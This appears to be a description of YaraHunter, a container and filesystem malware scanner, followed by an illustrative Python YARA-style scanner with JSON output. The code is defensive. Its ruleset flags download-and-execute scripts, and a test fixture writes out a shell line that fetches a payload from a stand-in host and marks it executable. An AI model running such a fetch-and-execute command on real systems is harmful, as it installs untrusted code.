
YaraHunter Scans for Malware in Container Environments
YaraHunter scans container images, active Docker containers, and filesystems to identify signs of malware.
Utilizing a YARA Ruleset for Malware Detection
It employs a YARA ruleset to detect files and other resources that match known malware signatures, which may indicate that the container or filesystem has been compromised. YaraHunter can be used in the following ways:
- At build-and-test: scan build artifacts within the CI/CD pipeline, providing reports on potential indicators of malware.
- At rest: scan local container images, for instance, before deployment, to ensure they are free from malware.
- At runtime: scan active Docker containers, especially if there are signs of unusual network traffic or CPU usage.
- Against filesystems: at any time, YaraHunter can examine local filesystems for indicators of compromise.
Key capabilities include:
- Scanning both running and at-rest containers.
- Scanning filesystems.
- Scanning during CI/CD build processes.
- Runs anywhere: highly portable, packaged as a Docker container.
- Designed for automation: easy to deploy, and produces easily interpretable JSON output.
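To make the filesystem-scan and JSON-reporting workflow concrete, here is an added example of the underlying idea: a small, self-contained scanner that compiles a constructed ruleset written in a subset of YARA syntax (text strings, hex strings with `??` wildcards, and `any of them` / `all of them` conditions), walks a directory tree, and emits a machine-readable report. This is illustrative code written for this page, not YaraHunter's own implementation, and it does not use libyara; the ruleset, the sample files, and the `MAX_FILE_BYTES` cap are all constructed assumptions.

```python
"""Minimal YARA-style signature scanner with JSON output (constructed example).

Supports a small subset of YARA rule syntax: text strings, hex strings with
"??" one-byte wildcards, and "any of them" / "all of them" conditions.
It is not YaraHunter's code and does not use libyara; it only illustrates
how signature matching over a filesystem turns into an automation-friendly report.
"""
import json
import os
import re
import tempfile
from dataclasses import dataclass

# Constructed ruleset in the supported YARA subset (not a real-world signature set).
RULESET = r'''
rule Shell_Downloader_Pattern {
    meta:
        description = "fetches a payload and marks it executable (constructed)"
    strings:
        $fetch = "curl -fsSL"
        $exec = "chmod +x"
    condition:
        all of them
}
rule ELF_Binary_Header {
    strings:
        $magic = { 7F 45 4C 46 ?? 01 }
    condition:
        any of them
}
rule Example_Marker {
    strings:
        $m = "EXAMPLE-MALWARE-MARKER-\"constructed\""
    condition:
        any of them
}
'''

MAX_FILE_BYTES = 16 * 1024 * 1024  # assumed cap: oversized files are skipped and counted

RULE_RE = re.compile(r'rule\s+(\w+)\s*\{(.*?)\n\}', re.S)
STRING_RE = re.compile(r'\$(\w+)\s*=\s*(?:"((?:[^"\\]|\\.)*)"|\{([^}]*)\})')
COND_RE = re.compile(r'condition:\s*(any|all)\s+of\s+them')


@dataclass
class Rule:
    name: str
    strings: dict   # identifier -> compiled regex over bytes
    condition: str  # "any" or "all"


def _text_pattern(text: str) -> bytes:
    # Resolve YARA-style escapes (\" and \\), then match the literal bytes.
    return re.escape(re.sub(r'\\(.)', r'\1', text).encode())


def _hex_pattern(hexs: str) -> bytes:
    # "??" is a one-byte wildcard; every other token is a literal byte value.
    return b''.join(b'.' if tok == '??' else re.escape(bytes([int(tok, 16)]))
                    for tok in hexs.split())


def compile_rules(source: str) -> list:
    """Parse the rule subset into Rule objects with precompiled byte regexes."""
    rules = []
    for m in RULE_RE.finditer(source):
        name, body = m.group(1), m.group(2)
        strings = {}
        for ident, text, hexs in STRING_RE.findall(body):
            pat = _text_pattern(text) if hexs == '' else _hex_pattern(hexs)
            strings[ident] = re.compile(pat, re.S)  # re.S so "??" also matches 0x0A
        cond = COND_RE.search(body)
        rules.append(Rule(name, strings, cond.group(1) if cond else 'any'))
    return rules


def scan_bytes(data: bytes, rules: list) -> list:
    """Return one finding per rule whose condition holds over `data`."""
    findings = []
    for rule in rules:
        offsets = {ident: [m.start() for m in rx.finditer(data)]
                   for ident, rx in rule.strings.items()}
        present = [ident for ident, offs in offsets.items() if offs]
        if rule.condition == 'all':
            matched = len(present) == len(offsets) and bool(offsets)
        else:
            matched = bool(present)
        if matched:
            findings.append({'rule': rule.name,
                             'strings': {k: v for k, v in offsets.items() if v}})
    return findings


def scan_tree(root: str, rules: list) -> dict:
    """Walk `root` and collect every file/rule match into a JSON-serialisable report."""
    report = {'root': root, 'files_scanned': 0, 'files_skipped': 0, 'findings': []}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                if os.path.getsize(path) > MAX_FILE_BYTES:
                    report['files_skipped'] += 1
                    continue
                with open(path, 'rb') as fh:
                    data = fh.read()
            except OSError:           # unreadable file: record it rather than abort the scan
                report['files_skipped'] += 1
                continue
            report['files_scanned'] += 1
            for f in scan_bytes(data, rules):
                report['findings'].append({'path': os.path.relpath(path, root), **f})
    return report


def build_sample_tree() -> str:
    """Create a constructed directory: one benign file and three that should match."""
    root = tempfile.mkdtemp(prefix='yarascan-')
    os.makedirs(os.path.join(root, 'usr', 'local', 'bin'))
    os.makedirs(os.path.join(root, 'var', 'cache'))
    samples = {
        # Mentions only one of the two strings, so "all of them" must NOT fire.
        'README.txt': b'Nothing to see here; chmod +x is mentioned but nothing is fetched.\n',
        'install.sh': b'#!/bin/sh\ncurl -fsSL http://example.invalid/p -o /tmp/p\nchmod +x /tmp/p\n',
        'usr/local/bin/tool': b'\x7fELF\x02\x01\x01\x00' + b'\x00' * 56,  # fake ELF header
        'var/cache/blob': b'\x00\x01EXAMPLE-MALWARE-MARKER-"constructed"\x00',
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), 'wb') as fh:
            fh.write(content)
    return root


def run_demo() -> dict:
    """Compile the constructed ruleset, scan the constructed tree, return the report."""
    return scan_tree(build_sample_tree(), compile_rules(RULESET))


if __name__ == '__main__':
    print(json.dumps(run_demo(), indent=2))
```

The report lists each matching file together with the rule name and the byte offsets of every matched string, which is the shape a CI/CD step or a SIEM ingest needs; the `README.txt` sample shows why `all of them` matters for reducing noise, since a lone `chmod +x` is not a finding on its own.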
YaraHunter is currently a work-in-progress (please refer to the Roadmap and issues list) and will be integrated into the ThreatMapper threat discovery platform. We welcome contributions to enhance this tool.